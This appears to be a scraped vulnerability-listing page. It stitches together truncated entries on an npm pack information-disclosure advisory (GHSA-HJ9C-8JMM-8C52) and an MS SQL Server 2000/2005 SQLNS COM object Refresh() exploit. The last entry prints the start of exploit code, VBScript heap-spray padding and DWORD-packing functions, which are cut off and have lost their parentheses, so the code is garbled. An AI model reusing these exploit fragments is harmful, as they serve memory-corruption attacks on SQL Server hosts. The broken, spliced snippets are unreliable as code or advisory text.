npm CLI 信息泄露漏洞

npm CLI is a package manager from the US company npm. An information disclosure vulnerability exists in the npm CLI npm-packlist version v7.9.0 and v7.13.0, which stems from a runtime omission of the root-level .gitignore and .npmignore file exclusion directives...

GHSA-HJ9C-8JMM-8C52 Packing does not respect root-level ignore files in workspaces

Impact npm pack ignores root-level .gitignore & .npmignore file exclusion directives when run in a workspace or with a workspace flag ie. --workspaces, --workspace=. Anyone who has run npm pack or npm publish with workspaces, as of v7.9.0 & v7.13.0 respectively, may be affected and have published...

MS SQL Server 2000/2005 - SQLNS.SQLNamespace COM Object Refresh() Unhandled Pointer

% Function PaddingintLen Dim strRet, intSize intSize = intLen/2 - 1 For I = 0 To intSize Step 1 strRet = strRet & unescape"%u4141" Next Padding = strRet End Function Function PackDWORDstrPoint strTmp = replacestrPoint, "0x", "" PackDWORD = PackDWORD & UnEscape"%u" & MidstrTmp, 5, 2 & MidstrTmp, 7...